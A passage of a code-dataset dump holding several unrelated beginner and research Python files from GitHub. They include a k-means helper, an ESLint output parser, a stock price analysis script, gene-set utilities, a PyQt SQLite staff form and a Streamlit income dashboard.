len(points)\n\n return (-1, list(vec))\n\n @staticmethod\n def k_means(vectors, k, distance_method):\n def fan(points, center_of_mass):\n # расчитать кластеры\n clusters = [[]] * len(center_of_mass)\n for i in range(len(center_of_mass)):\n clusters[i] = []\n\n for p in points:\n dist = list(map(lambda x: distance_method(x[1], p[1]), center_of_mass))\n c_n = dist.index(min(dist))\n clusters[c_n].append(p)\n\n # расчитать новые центры масс\n new_center_of_mass = []\n i = 0\n for c in clusters:\n new_center_of_mass.append(KMeans.get_center_of_mass(c, center_of_mass[i]))\n i+=1\n\n # cравнить цм\n if center_of_mass == new_center_of_mass:\n return clusters\n else:\n return fan(points, new_center_of_mass)\n\n c_o_m = random.sample(vectors, k)\n return fan(vectors, c_o_m)","repo_name":"agreenwalrus/ImageProcessing","sub_path":"Im/KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24080373184","text":"# Write a function to find all pairs of an integer array whose sum is equal to a given number. Do not consider commutative pairs.\r\n\r\ndef pairSum(array, value):\r\n newArray = []\r\n for i in range(len(array)):\r\n for j in range(i+1, len(array)):\r\n if array[i] + array[j] == value:\r\n newArray.append(str(array[i]) + \"+\" + str(array[j]))\r\n return newArray\r\n\r\n\r\nprint(pairSum([2, 4, 3, 5, 6, -2, 4, 7, 8, 9],7))","repo_name":"shollet/Python-Exercises","sub_path":"1. ArraysLists/pairSum/pairSum.py","file_name":"pairSum.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34850003444","text":"\ndef eslintParser(fileName):\n\n\tfile = open(fileName,\"r\")\n\t#print(file.read())\n\n\n\tfor words in file:\n\t\tif(words[0] == \"🔥\"):\n\t\t\t#print(words)\n\t\t\tnumberOfProblems = words.split(\" \")[2]\n\t\t\tnumberOfErrors = words.split(\" \")[6].replace(\"(\",\"\")\n\t\t\tnumberOfWarnings = words.split(\" \")[8]\n\n\t\t\tproblemsList.append(numberOfProblems)\n\t\t\terrorsList.append(numberOfErrors)\n\t\t\twarningsList.append(numberOfWarnings)\n\t\t\tsuccessfulFileNames.append(fileName)\n\n\t\t\t#print(numberOfErrors)\n\t\t\tprint(words.split(\" \"))\n\tfile.close()\n\n\n\nfile2 = open(\"eslintDirs.txt\") #2790 - 2990\nfileList = [] \nfor packages in file2:\n\tfileList.append(packages)\n#each Packages had a '\\n' char attached\n#Remove the \"\\n\" character\ni = 0\nwhile(i < len(fileList)):\n\tif(\"\\n\" in fileList[i]):\n\t\tfileList[i] = fileList[i].replace(\"\\n\", \".txt\")\n\t\t#print(\"Has New line\")\n\ti = i + 1\n\nfile2.close()\n\n\n\n\n#Creating Global Lists\nproblemsList = []\nerrorsList = [] \nwarningsList = []\n\n\n\n\nsuccessfulFileNames = []\n\nprint(fileList)\n\n\n\n#____\ni = 0 \nwhile(i < len(fileList)):\n\teslintParser(fileList[i])\n\ti = i + 1\n\n\n\n#### UNcomment to see them parsed\n# print(successfulFileNames)\n# print(problemsList)\n# print(errorsList)\n# print(warningsList)\n\nprint(\"Number of successfulFileNames\", len(successfulFileNames))\nprint(\"Number of Problems \", len(problemsList))\nprint(\"Number of Errors \", len(errorsList))\nprint(\"NumberOFwarnings \", len(warningsList))\n\n\n","repo_name":"atearjen/eslint_analysis","sub_path":"eslintParser.py","file_name":"eslintParser.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43889732180","text":"#Evan Pomeroy 6/3/2022\r\n\r\nimport matplotlib.pyplot as plt\r\nimport datetime as dt\r\n\r\ndef totalL():\r\n \"\"\"\r\n Creates list of data for every day the stock is traded\r\n \r\n Asks for file then iterates through line to create list of lines from csv\r\n \r\n Parameters:\r\n none\r\n \r\n Input:\r\n File name\r\n \r\n Returns:\r\n List of stock info by day\r\n \r\n \"\"\"\r\n x=True\r\n while x:\r\n try:\r\n stock = open(input(\"Enter file name (hint:'UA-2021.csv'): \"), \"r\")\r\n x=False\r\n except:\r\n #make sure right file\r\n print(\"Error: File not found\\tHint: Try 'UA-2021.csv'\")\r\n LL = []\r\n ct = 0\r\n for line in stock:\r\n if ct ==0:\r\n ct =1\r\n else:\r\n d = line.split(\",\")\r\n LL.append(d)\r\n stock.seek(0,0)\r\n return LL\r\n\r\n\r\ndef datesL(listall):\r\n \"\"\"\r\n Creates a list of dates stock was traded from list of trading day info\r\n \r\n Parameters:\r\n List of info from trading day\r\n \r\n Returns:\r\n List of dates\r\n \r\n \"\"\"\r\n dates = []\r\n for i in listall:\r\n dates.append(i[0])\r\n return dates\r\n\r\ndef openL(listall):\r\n \"\"\"\r\n Creates a list of open prices when stock was traded\r\n \r\n Parameters:\r\n List of info from trading day\r\n \r\n Returns:\r\n List opening prices\r\n \r\n \"\"\"\r\n opens = []\r\n for i in listall:\r\n o = i[1]\r\n o2 = o.replace('\"','')\r\n opens.append(float(o2))\r\n return opens\r\n\r\ndef closeL(listall):\r\n \"\"\"\r\n Creates a list of closing prices when stock was traded\r\n \r\n Parameters:\r\n List of info from trading day\r\n \r\n Returns:\r\n List closing prices\r\n \r\n \"\"\"\r\n closes = []\r\n for i in listall:\r\n c = i[4]\r\n c2 = c.replace('\"','')\r\n closes.append(float(c2))\r\n return closes\r\n\r\ndef high_close(close, date):\r\n \"\"\"\r\n Finds max stock price at closing from the year\r\n \r\n uses similar indexes to find date from a maximum close price index\r\n \r\n Parameters:\r\n List of dates\r\n List of closing prices\r\n \r\n Returns:\r\n none\r\n \r\n Prints:\r\n String with max price and date\r\n \r\n \"\"\"\r\n maxc = 0\r\n index = 0\r\n dref = 0\r\n for i in close:\r\n if i > maxc:\r\n maxc = i\r\n dref = index\r\n index += 1\r\n print(f'The highest closing price was ${maxc} on {date[dref]}')\r\n\r\ndef low_open(openp, date):\r\n \"\"\"\r\n Finds min stock price at open from the year\r\n \r\n uses similar indexes to find date from a min open price index\r\n \r\n Parameters:\r\n List of dates\r\n List of opening prices\r\n \r\n Returns:\r\n none\r\n \r\n Prints:\r\n String with min price and date\r\n \r\n \"\"\"\r\n mino = 999\r\n index = 0\r\n dref = 0\r\n for i in openp:\r\n if i < mino:\r\n mino = i\r\n dref = index\r\n index += 1\r\n print(f'The lowest opening price was ${mino} on {date[dref]}')\r\n\r\ndef high_close10(close, date):\r\n \"\"\"\r\n Finds 10 max stock price at closing from the year\r\n \r\n uses similar indexes to find date from a maximum close price index.\r\n Prices and dates are stored in a list then current max price and date are\r\n removed from list. It does this 9 more times to find the max 10 times.\r\n \r\n Parameters:\r\n List of dates\r\n List of closing prices\r\n \r\n Returns:\r\n none\r\n \r\n Prints:\r\n String with 10 max prices and dates\r\n \r\n \"\"\"\r\n high = []\r\n dateL = []\r\n for x in range(10):\r\n maxc = 0\r\n index = 0\r\n dref = 0\r\n for i in close:\r\n if i > maxc:\r\n maxc = i\r\n dref = index\r\n index += 1\r\n high.append(maxc)\r\n dateL.append(date[dref])\r\n close.pop(dref)\r\n date.pop(dref)\r\n print('10 Highest Closing Prices:\\n')\r\n for i in range(10):\r\n print(f'Price: ${high[i]}\\tDate: {dateL[i]}')\r\n \r\ndef low_open10(openL, date):\r\n \"\"\"\r\n Finds 10 min stock price at open from the year\r\n \r\n uses similar indexes to find date from a min close price index.\r\n Prices and dates are stored in a list then current min price and date are\r\n removed from list. It does this 9 more times to find the min 10 times.\r\n \r\n Parameters:\r\n List of dates\r\n List of opening prices\r\n \r\n Returns:\r\n none\r\n \r\n Prints:\r\n String with 10 min prices and dates\r\n \r\n \"\"\"\r\n low = []\r\n dateL = []\r\n for x in range(10):\r\n mino = 999\r\n index = 0\r\n dref = 0\r\n for i in openL:\r\n if i < mino:\r\n mino = i\r\n dref = index\r\n index += 1\r\n low.append(mino)\r\n dateL.append(date[dref])\r\n openL.pop(dref)\r\n date.pop(dref)\r\n print('10 Lowest Opening Prices:\\n')\r\n for i in range(10):\r\n print(f'Price: ${low[i]} \\tDate: {dateL[i]}')\r\n \r\n\r\ndef openchart(openL, date):\r\n \"\"\"\r\n Creates graph of average opening price by month\r\n \r\n When the first 2 characters (month) match the iterator date, the price is \r\n added to a temporary total to find the average. The average is added to\r\n a list and this happend 12 times (12 months). The numbers are put into a\r\n pyplot and x axis is substituted for strings of months.\r\n \r\n Parameters:\r\n List of dates\r\n List of opening prices\r\n \r\n Returns:\r\n none\r\n \r\n Prints:\r\n Confirmation of graph creation\r\n \r\n Produces:\r\n png file of graph\r\n \r\n \"\"\"\r\n mlist = ['Jan', 'Feb', 'March', 'April', 'May', 'June', 'July', 'Aug','Sep','Oct','Nov','Dec']\r\n avgo = []\r\n month = []\r\n #range of months\r\n for i in range(1,13):\r\n Ltot = 0\r\n ct = 0\r\n for x in range(len(date)):\r\n #test if date matches current iteration date\r\n if int(date[x][0:2]) == i:\r\n Ltot += openL[x]\r\n ct+=1\r\n avgo.append(round(Ltot/ct,2))\r\n month.append(i)\r\n plt.xticks(month, mlist)\r\n plt.plot(month, avgo)\r\n plt.ylabel('Stock Price ($)')\r\n plt.title(\"Average Opening Price by Month\")\r\n plt.savefig('Open Price by Month.png')\r\n plt.show()\r\n print(\"Graph saved as 'Open Price by Month.png'\")\r\n \r\n\r\n \r\ndef closechart(close, date):\r\n \"\"\"\r\n Creates graph of average close price by month\r\n \r\n When the first 2 characters (month) match the iterator date, the price is \r\n added to a temporary total to find the average. The average is added to\r\n a list and this happend 12 times (12 months). The numbers are put into a\r\n pyplot and x axis is substituted for strings of months.\r\n \r\n Parameters:\r\n List of dates\r\n List of closing prices\r\n \r\n Returns:\r\n none\r\n \r\n Prints:\r\n Confirmation of graph creation\r\n \r\n Produces:\r\n png file of graph\r\n \r\n \"\"\"\r\n mlist = ['Jan', 'Feb', 'March', 'April', 'May', 'June', 'July', 'Aug','Sep','Oct','Nov','Dec']\r\n avgo = []\r\n month = []\r\n for i in range(1,13):\r\n Ltot = 0\r\n ct = 0\r\n for x in range(len(date)):\r\n if int(date[x][0:2]) == i:\r\n Ltot += close[x]\r\n ct+=1\r\n avgo.append(round(Ltot/ct,2))\r\n month.append(i)\r\n plt.xticks(month, mlist)\r\n plt.plot(month, avgo)\r\n plt.ylabel('Stock Price ($)')\r\n plt.title(\"Average Closing Price by Month\")\r\n plt.savefig(\"Close Price by Month.png\")\r\n plt.show()\r\n print(\"Graph saved as 'Close Price by Month.png'\")\r\n\r\ndef main():\r\n try:\r\n file = totalL()\r\n print(\"\\n\")\r\n high_close(closeL(file),datesL(file))\r\n print(\"\\n\")\r\n low_open(openL(file),datesL(file))\r\n print(\"\\n\")\r\n high_close10(closeL(file),datesL(file))\r\n print(\"\\n\")\r\n low_open10(openL(file),datesL(file))\r\n print(\"\\n\")\r\n openchart(openL(file),datesL(file))\r\n print(\"\\n\")\r\n closechart(closeL(file),datesL(file))\r\n except:\r\n print(\"Error!\\tMake sure to use the file submitted through canvas (UA-2021.csv\")\r\n\r\nif __name__ == '__main__':\r\n main()\r\n \r\n\r\n\r\n#I worked very hard on this","repo_name":"ejpomero/Stock-Analysis","sub_path":"Stock Analysis.py","file_name":"Stock Analysis.py","file_ext":"py","file_size_in_byte":8302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"44906065287","text":"from .bigru import build_bigru\nfrom .fc import build_fc\nfrom .lstm import build_lstm\nfrom .m_resnet import build_m_resnet\nfrom .resnet import build_resnet\n\n\ndef build_img_model(cfg):\n if cfg.MODEL.IMG_MODEL in [\"resnet18\", \"resnet50\", \"resnet101\"]:\n model = build_resnet(cfg)\n elif cfg.MODEL.IMG_MODEL in [\"m_resnet50\", \"m_resnet101\"]:\n model = build_m_resnet(cfg)\n # elif cfg.MODEL.IMG_MODEL == \"diva\":\n # model = build_diva(cfg)\n else:\n raise NotImplementedError\n return model\n\n\ndef build_text_model(cfg):\n if cfg.MODEL.TEXT_MODEL == \"bigru\":\n model = build_bigru(cfg)\n elif cfg.MODEL.TEXT_MODEL == \"lstm\":\n model = build_lstm(cfg)\n # elif cfg.MODEL.TEXT_MODEL == \"bert\":\n # model = build_bert(cfg)\n elif cfg.MODEL.TEXT_MODEL == \"fc\":\n model = build_fc(cfg)\n else:\n raise NotImplementedError\n return model\n","repo_name":"BrandonHanx/CompFashion","sub_path":"lib/models/backbones/build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"41268604243","text":"#gene_set_handling.py 20.11.03\n\n\ndef deg_file_to_dict_and_list(deg_file, delimiter, abs_log2_threshold, padj_threshold):\n#Requirements before entering this function\n#DESeq2 outputs\n#Currently \"Specified\" to handle Vasculitis project\n\n\tprint (\"Info :: abs log2 threshold > %s\" % abs_log2_threshold)\n\tprint (\"Info :: adj p-value threshold > %s\" % padj_threshold)\n\n\tdeg_dict = {}\n\tdeg_list = []\n\n\tdeg_df = pd.read_csv(deg_file, sep = delimiter, header=0)\n\tr, c = deg_df.shape\n\n\tfor i in range(r):\n\t\tgene = deg_df.iloc[i][0]\n\t\tlog2fc = float(deg_df.iloc[i][2])\n\t\tabs_log2fc = float(abs(deg_df.iloc[i][2]))\n\t\tpadj = float(deg_df.iloc[i][6])\n\n\t\tif abs_log2fc > float(abs_log2_threshold):\n\t\t\tif padj < float(padj_threshold):\n\t\t\t\tdeg_dict[gene] = [log2fc, padj]\n\t\t\t\tdeg_list.append(gene)\n\n\tprint (\"Info :: Total Number of DEGS > %s \" % len(deg_list))\n\n\tdeg_list = list(deg_list)\n\n\treturn deg_dict, deg_list\n\ndef gene_dict_to_output(deg_dict, output_file):\n\n\toutput_txt = open(output_file,'w')\n\toutput_txt.write(\"gene\\tlog2fc\\tpadj\\n\")\n\n\tfor gene in list(deg_dict.keys()):\n\n\t\tlog2fc = deg_dict[gene][0]\n\t\tpadj = deg_dict[gene][1]\n\n\t\toutput_txt.write(\"%s\\t%s\\t%s\\n\" % (gene, log2fc, padj))\n\n\toutput_txt.close()\n\ndef gene_file_to_gene_list(input_file, delimiter, focus_column):\n#intentioned to...\n#Requirements: convert_genesymbol_to_entrezid.R\n#Preprocess for function > api_geneset_enrichment\n\t\n\tinput_df = pd.read_csv(input_file, sep = delimiter, header=None, dtype=str)\n\tgene_list = input_df.iloc[:,focus_column]\n\tgene_list = list(gene_list)\n\n\treturn gene_list\n\ndef sample_class_information_to_dict(input_file, delimiter):\n\n\tinput_df = pd.read_csv(input_file, sep = delimiter, header=None, dtype=str)\n\tr, c = input_df.shape\n\tprint (input_df)\n\tprint (r,c)\n\tsample_dict = {}\n\n\tfor i in range(r):\n\t\tsampleID = input_df.iloc[i,0]\n\t\tsample_class = input_df.iloc[i,1]\n\t\tsample_dict[sampleID] = sample_class\n\n\treturn sample_dict\n\n\ndef gene_file_to_gene_dict_and_list(input_file, delimiter, focus_column):\n#intentioned to...\n#Requirements: convert_genesymbol_to_entrezid.R\n#Preprocess for function > api_geneset_enrichment\n\t\n\tinput_df = pd.read_csv(input_file, sep = delimiter, header=0, dtype=str)\n\tgene_list = list(input_df.iloc[:,focus_column])\n\tgene_dict = {}\n\tr, c = input_df.shape\n\n\tfor i in range(r):\n\t\tgene = input_df.iloc[i][0]\n\t\tfc = input_df.iloc[i][1]\n\t\tgene_dict[gene] = fc\n\n\treturn gene_list, gene_dict\n\ndef sample_metafile_to_info_dict(input_file, delimiter):\n\n\tinput_df = pd.read_csv(input_file, sep = delimiter, header=0, dtype=str)\n\tr, c = input_df.shape\n\n\tkfold_sample_dict = {}\n\tsample_class_dict = {}\n\n\tfor i in range(r):\n\t\t\n\t\tsampleID = input_df.iloc[i][0]\n\t\tkfold = input_df.iloc[i][4]\n\n\t\tif input_df.iloc[i][1] == \"case\":\n\t\t\tsample_class = 1\n\t\tif input_df.iloc[i][1] == \"control\":\n\t\t\tsample_class = 0\n\t\t\n\t\tsample_class_dict[sampleID] = sample_class\n\t\t\n\t\ttry: kfold_sample_dict[kfold].append(sampleID)\n\t\texcept KeyError: kfold_sample_dict[kfold] = [sampleID]\n\n\treturn kfold_sample_dict, sample_class_dict\n\ndef sample_metafile_to_info_dict_v2(input_file, delimiter):\n\n\tinput_df = pd.read_csv(input_file, sep = delimiter, header=0, dtype=str)\n\tr, c = input_df.shape\n\n\tkfold_sample_dict = {}\n\tsample_class_dict = {}\n\n\tfor i in range(r):\n\t\t\n\t\tsampleID = input_df.iloc[i][0]\n\t\tkfold = input_df.iloc[i][5]\n\n\t\tif input_df.iloc[i][1] == \"case\" or int(input_df.iloc[i][1]) == 1:\n\t\t\tsample_class = 1\n\t\tif input_df.iloc[i][1] == \"control\" or int(input_df.iloc[i][1]) == 0:\n\t\t\tsample_class = 0\n\t\t\n\t\tsample_class_dict[sampleID] = sample_class\n\t\t\n\t\ttry: kfold_sample_dict[kfold].append(sampleID)\n\t\texcept KeyError: kfold_sample_dict[kfold] = [sampleID]\n\n\treturn kfold_sample_dict, sample_class_dict\n\n\n\n\ndef api_geneset_enrichment(gene_list, annot_type):\n#Note: specific options are fixed\n\n\tbase_url = \"http://david.abcc.ncifcrf.gov/api.jsp?\"\n\tgene_symbol = \"type=ENTREZ_GENE_ID&ids=\"\n\ttool = \"&tool=term2term\"\n\n\tif annot_type == \"goterm\":\n\t\tannot = \"&annot=GOTERM_BP_FAT,GOTERM_CC_FAT,GOTERM_MF_FAT\"\n\tif annot_type == \"pathway\":\n\t\tannot = \"&annot=BIOCARTA,KEGG_PATHWAY\"\n\tif annot_type == \"disease\":\n\t\tannot = \"&annot=GENETIC_ASSOCIATION_DB_DISEASE,OMIM_DISEASE\"\n\n\tgene_list_str = \"\"\n\tgene_list_str += gene_list[0]\n\tfor i in range(1, len(gene_list)):\n\t\tgene = gene_list[i]\n\t\tgene_list_str += \",%s\" % gene\n\t\t\n\tapi_str = base_url + gene_symbol + gene_list_str + tool + annot\n\n\treturn api_str\n\n\nif __name__ == \"__main__\":\n print ('This is not meant to be run')\nelse:\n import pandas as pd\n print (\"LOADING :: gene_set_handling\")\n","repo_name":"jaeyunsung/Aortitis_2022","sub_path":"src/main/gene_set_handling.py","file_name":"gene_set_handling.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4155591539","text":"import sys\nimport sqlite3\n\nfrom PyQt5.QtWidgets import QApplication, QWidget, QTableWidgetItem\nfrom form_staff import Ui_Form\n\nSTAFF_POSTS = ['бухгалтер', 'менеджер', 'программист']\n\nclass MyWidget(QWidget, Ui_Form):\n def __init__(self):\n super(MyWidget, self).__init__()\n self.setupUi(self)\n self.cbPost.addItems(STAFF_POSTS)\n self.pbOpen.clicked.connect(self.open)\n self.pbInsert.clicked.connect(self.insert)\n\n def open(self):\n #try:\n self.conn = sqlite3.connect('basepomain')\n cur = self.conn.cursor()\n data = cur.execute(\"select * from staff\")\n col_name = [i[0] for i in data.description]\n data_rows = data.fetchall()\n #except Exception as e:\n # print(\"Ошибка с подключением к базе данных\")\n # return e\n self.twStaffs.setColumnCount(len(col_name))\n self.twStaffs.setHorizontalHeaderLabels(col_name)\n self.twStaffs.setRowCount(0)\n for i, row in enumerate(data_rows):\n self.twStaffs.setRowCount(self.twStaffs.rowCount()+1)\n for j, elem in enumerate(row):\n self.twStaffs.setItem(i, j, QTableWidgetItem(str(elem)))\n self.twStaffs.resizeColumnsToContents()\n\n def update_twStaffs(self, query=\"select * from staff\"):\n try:\n cur = self.conn.cursor()\n data = cur.execute(query).fetchall()\n except Exception as e:\n print(f\"Проблемы с подключением к БД. {e}\")\n return e\n self.twStaffs.setRowCount(0)\n for i, row in enumerate(data):\n self.twStaffs.setRowCount(self.twStaffs.rowCount() +1)\n for j, elem in enumerate(row):\n self.twStaffs.setItem(i, j, QTableWidgetItem(str(elem)))\n self.twStaffs.resizeColumnsToContents()\n\n def insert(self):\n row = [self.leFio.text(), 'муж' if self.rbMale.isChecked() else 'жен', self.spAge.text(),\n self.lePhone.text(), self.leEmail.text(), self.cbPost.itemText(self.cbPost.currentIndex()),\n self.spExp.text()]\n try:\n cur = self.conn.cursor()\n cur.execute(f\"\"\"insert into staff (fio, sex, age, phone, email, position, exp)\n values('{row[0]}', '{row[1]}', {row[2]},'{row[3]}','{row[4]}', '{row[5]}', {row[6]})\"\"\")\n self.conn.commit()\n cur.close()\n except Exception as e:\n print(\"Не смогли добавить запись.\")\n return e\n self.update_twStaffs()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = MyWidget()\n ex.show()\n sys.exit(app.exec_())","repo_name":"walravn5/Data-Base","sub_path":"DemoEz/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24515959497","text":"import pandas as pd # pip install pandas openpyxl\nimport plotly.express as px # pip install plotly-express\nimport streamlit as st # pip install streamlit\nimport numpy as np\nfrom streamlit_echarts import st_echarts\nimport pydeck as pdk\nfrom bokeh.plotting import figure\nimport matplotlib.pyplot as plt\n\nst.set_page_config(page_title=\"Sales Dashboard\", page_icon=\":bar_chart:\", layout=\"wide\")\n\n\n@st.cache_data\ndef get_data_from_excel():\n df = pd.read_excel(\n io=\"Ai_companies.xlsx\",\n engine=\"openpyxl\",\n sheet_name=\"sheet1\",\n # skiprows=3,\n usecols=\"A:J\",\n nrows=15,\n )\n return df\n\n\ndf = get_data_from_excel()\n# st.write(df)\nst.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n)\npx.defaults.width = 1000\npx.defaults.height = 500\n\n\ndef bar_Reliance():\n reliance_data = df[df[\"Name\"] == \"Reliance Industries Ltd.\"]\n years = [2019, 2020, 2021, 2022, 2023]\n income_values = reliance_data.iloc[0, 3:8].tolist()\n X = years\n Y = income_values\n data = {\n \"Year\": X,\n \"Income (in CR)\": Y,\n }\n df2 = pd.DataFrame(data)\n\n # Create a Streamlit bar chart\n st.title(\"Reliance \")\n st.bar_chart(df2, use_container_width=True)\n\n\ncss = \"\"\"\n\n\"\"\"\nst.markdown(css, unsafe_allow_html=True)\ncss = \"\"\"\n\n\"\"\"\nst.markdown(css, unsafe_allow_html=True)\n\n\n# # Filter the data for \"Reliance Industries Ltd.\"\ndef covid():\n data = {\n \"Company Name\": [\n \"Tata Elxsi\",\n \"Kellton Tech Solutions Limited\",\n \"Happiest Minds Technologies Ltd.\",\n \"Zensar Technologies Ltd.\",\n \"Persistent Systems\",\n \"Saksoft\",\n \"Cyient\",\n \"Affle (India) Limited\",\n \"Haptik\",\n \"Flutura\",\n \"Niki.ai\",\n \"Reliance Industries Ltd.\",\n \"TVS Motor Company\",\n \"Tata Motors\",\n \"Indian Oil Corporation\",\n \"Mahindra & Mahindra\",\n \"Hindalco Industries\",\n \"Exide Industries Ltd\",\n \"Aether Industries\",\n \"Ola Electric\",\n \"Yulu\",\n \"EMotorad\",\n \"Wipro\",\n \"Tata Consultancy Services Ltd\",\n \"Mindtree\",\n \"Infosys Ltd\",\n \"Tech Mahindra\",\n \"Subex Ltd\",\n \"Zoho\",\n \"Razorpay Software Pvt Ltd\",\n ],\n \"Total_Income\": [\n 10648.47,\n 4137.5,\n 4694.7,\n 8089.69,\n 15240.63,\n 745.01,\n 9262.4,\n 1528.06,\n 353.67,\n 484.63,\n 15.2,\n 3272020,\n 115054,\n 1453594,\n 2825231,\n 471108,\n 804860,\n 57840.04,\n 1265,\n 3074.72,\n 46.4,\n 252.49,\n 364947,\n 904305,\n 1516,\n 555228,\n 211991,\n 1738,\n 25346.05,\n 2330.2,\n ],\n }\n df = pd.DataFrame(data)\n\n # Create a line chart using st.line_chart\n st.line_chart(\n df.set_index(\"Company Name\")[\"Total_Income\"], use_container_width=True\n )\n\n # X = df.iloc[:,9:]\n\n # Y = df.iloc[:,-1]\n\n # p = figure(\n # title='Effect of Covid19 On Indian Startups',\n # x_axis_label='x',\n # y_axis_label='y')\n\n # # p.line(x, y, legend_label='Trend', line_width=2)\n\n # st.line_chart(df, x=X,y=Y, use_container_width=True)\n\n\n# Select the relevant columns for the last five years\n# reliance_data = reliance_data[['Income Year', 'Income of 5 Years']]\n\n# Create a Streamlit bar chart\n# st.bar_chart(reliance_data.set_index('Income Year'))\nst.header(\" :blue[DASHBOARD] :trophy:\")\nwith st.sidebar.header(\"Please Filter Here:\"):\n location = st.sidebar.multiselect(\n \"Select the Location:\",\n options=df[\"Location\"].unique(),\n default=df[\"Location\"].unique(),\n )\n custom_css = \"\"\"\n \n \"\"\"\n st.markdown(custom_css, unsafe_allow_html=True)\n head1, head2 = st.columns(2)\n with head1:\n q1 = st.button(\"TOP_COMPANY\", on_click=bar_Reliance, type=\"primary\")\n m1 = st.markdown(\n \"\"\"\n \"\"\",\n unsafe_allow_html=True,\n )\n with head2:\n q2 = st.button(\"COVID19_STATITICS\", on_click=covid, type=\"secondary\")\n m = st.markdown(\n \"\"\"\n \"\"\",\n unsafe_allow_html=True,\n )\n\n\nsector = st.sidebar.multiselect(\n \"Select the Sector Type:\",\n options=df[\"Sector\"].unique(),\n default=df[\"Sector\"].unique(),\n)\nuploaded_file = st.file_uploader(\"Choose a file\")\nif uploaded_file is not None:\n dd = pd.read_csv(uploaded_file, encoding=\"ISO-8859-1\")\n st.write(dd)\n # dd.to_csv(\"uploaded_file.csv\", index=False)\n dd[\"Date\"] = pd.to_datetime(dd[\"Date\"])\n dd.set_index(dd[\"Date\"], inplace=True)\n\n options = dd.columns.to_list()\n user_input = st.multiselect(\"Select an option: \", options)\n # st.write(\"You selected: \", user_input)\n if user_input:\n # plt.plot(dd[user_input[0]].head(100), dd[user_input[1]].head(100))\n plt.plot(dd.index.year, dd[user_input[0]])\n st.pyplot(plt)\ndf_selection = df.query(\"Location == @location & Sector == @sector\")\n\ntotal_revenue = int(df_selection[\"Total_Income\"].sum())\naverage_income_2023 = round(df_selection[\"Income in 2023(in CR)\"].mean(), 2)\ncolumn1, column2 = st.columns(2)\nwith column1:\n # st.subheader(\"total income\")\n st.subheader(f\":blue[Total_Income] {total_revenue} :red[CR]\")\nwith column2:\n st.subheader(f\":blue[Average Income In 2023:] {average_income_2023} :red[CR]\")\n# ---- MAINPAGE ----\nst.title(\":bar_chart: INCOME TRENDS\")\nst.markdown(\"##\")\n\n\ntab1, tab2, tab3, tab4, tab5 = st.tabs([\"2023\", \"2022\", \"2021\", \"2020\", \"2019\"])\nwith tab1:\n top_10_companies = df.sort_values(by=\"Income in 2023(in CR)\", ascending=False).head(\n 10\n )\n st.write(top_10_companies[[\"Name\", \"Income in 2023(in CR)\"]])\nwith tab2:\n top_10_companies = df.sort_values(by=\"Income in 2022(in CR)\", ascending=False).head(\n 10\n )\n st.write(top_10_companies[[\"Name\", \"Income in 2022(in CR)\"]])\nwith tab3:\n top_10_companies = df.sort_values(by=\"Income in 2021(in CR)\", ascending=False).head(\n 10\n )\n st.write(top_10_companies[[\"Name\", \"Income in 2021(in CR)\"]])\nwith tab4:\n top_10_companies = df.sort_values(by=\"Income in 2020(in CR)\", ascending=False).head(\n 10\n )\n st.write(top_10_companies[[\"Name\", \"Income in 2020(in CR)\"]])\nwith tab5:\n top_10_companies = df.sort_values(by=\"Income in 2019(in CR)\", ascending=False).head(\n 10\n )\n st.write(top_10_companies[[\"Name\", \"Income in 2019(in CR)\"]])\n\n\ndata = {\n \"Sector\": [\n \"Natural Language Processing\",\n \"Conversational AI\",\n \"Machine Learning\",\n \"Big Data\",\n \"ERP Consulting\",\n \"Data Analytics\",\n \"Artificial Intelligence\",\n \"Custom Software Development\",\n \"Electrive Vehicle\",\n \"Electric Vehicle\",\n ],\n \"Total_Income\": [\n 15.20,\n 353.67,\n 4137.50,\n 4694.70,\n 8089.69,\n 9262.40,\n 13406.17,\n 15240.63,\n 3272020.00,\n 4393879.00,\n ],\n}\n\ndf10 = pd.DataFrame(data)\nst.bar_chart(df10.set_index(\"Sector\"), use_container_width=True)\n\nsales_by_sector = (\n df_selection.groupby(by=[\"Sector\"])[[\"Total_Income\"]]\n .sum()\n .sort_values(by=\"Total_Income\")\n)\n# print(sales_by_sector)\n\n# Create a bar chart with Sector on the y-axis and Total_Income on the x-axis\n\nproduct_sales = px.bar(\n sales_by_sector,\n x=\"Total_Income\",\n y=sales_by_sector.index,\n orientation=\"h\",\n title=\"Sales by sector\",\n color_discrete_sequence=[\"#275BBB\"] * len(sales_by_sector),\n template=\"plotly_white\",\n)\nprint(product_sales)\nproduct_sales.update_layout(plot_bgcolor=\"rgba(0,0,0,0)\", xaxis=(dict(showgrid=False)))\nfig_avg_income_2023 = px.bar(\n sales_by_sector,\n x=\"Total_Income\",\n y=sales_by_sector.index,\n orientation=\"h\",\n title=\"Sales by sector\",\n color_discrete_sequence=[\"#275BBB\"] * len(sales_by_sector),\n template=\"plotly_white\",\n)\nproduct_sales.update_layout(plot_bgcolor=\"rgba(0,0,0,0)\", xaxis=(dict(showgrid=False)))\n# visvalization\ncolumn1, column2, column3 = st.columns(3)\ncolumn1.plotly_chart(product_sales, use_container_width=True)\nst.title(\"TOP 10 STARTUPS\")\ndf5 = pd.DataFrame(\n {\n \"col1\": [\n 28.6139,\n 19.7515,\n 26.8467,\n 15.3173,\n 11.1271,\n 22.9868,\n 27.0238,\n 10.8505,\n 22.2587,\n 31.1471,\n ],\n \"col2\": [\n 77.2090,\n 75.7139,\n 80.9462,\n 75.7139,\n 78.6569,\n 87.8550,\n 74.2179,\n 76.2711,\n 